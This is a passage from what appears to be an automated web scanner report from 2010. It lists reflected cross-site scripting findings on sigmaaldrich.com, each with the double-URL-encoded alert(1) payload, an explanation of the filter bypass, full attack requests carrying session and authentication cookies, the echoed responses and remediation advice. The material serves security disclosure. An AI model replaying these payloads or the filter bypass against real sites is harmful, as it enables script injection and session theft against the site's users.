Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 28984
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-home/literature-requesta171f";alert(1)//b6d51f297e","E404") ;
   </script>
...[SNIP]...

1.228. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a34d2%2522%253balert%25281%2529%252f%252f0001c9fecf9 was submitted in the REST URL parameter 1. This input was echoed as a34d2";alert(1)//0001c9fecf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta34d2%2522%253balert%25281%2529%252f%252f0001c9fecf9/sigma-aldrich/the-americas/united-states HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:22 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta34d2";alert(1)//0001c9fecf9/sigma-aldrich/the-americas/united-states","E404") ;
   </script>
...[SNIP]...

1.229. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c7%2522%253balert%25281%2529%252f%252fb001a96c5d1 was submitted in the REST URL parameter 2. This input was echoed as d27c7";alert(1)//b001a96c5d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd27c7%2522%253balert%25281%2529%252f%252fb001a96c5d1/the-americas/united-states HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:24 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd27c7";alert(1)//b001a96c5d1/the-americas/united-states","E404") ;
   </script>
...[SNIP]...

1.230. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d444%2522%253balert%25281%2529%252f%252f92793edcdff was submitted in the REST URL parameter 3. This input was echoed as 3d444";alert(1)//92793edcdff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas3d444%2522%253balert%25281%2529%252f%252f92793edcdff/united-states HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas3d444";alert(1)//92793edcdff/united-states","E404") ;
   </script>
...[SNIP]...

1.231. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c25b4%2522%253balert%25281%2529%252f%252f8180bf336f was submitted in the REST URL parameter 4. This input was echoed as c25b4";alert(1)//8180bf336f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-statesc25b4%2522%253balert%25281%2529%252f%252f8180bf336f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-statesc25b4";alert(1)//8180bf336f","E404") ;
   </script>
...[SNIP]...

1.232. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf93%2522%253balert%25281%2529%252f%252fd613d4dcd48 was submitted in the REST URL parameter 1. This input was echoed as aaf93";alert(1)//d613d4dcd48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentaaf93%2522%253balert%25281%2529%252f%252fd613d4dcd48/sigma-aldrich/the-americas/united-states/jai-nagarkatti-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
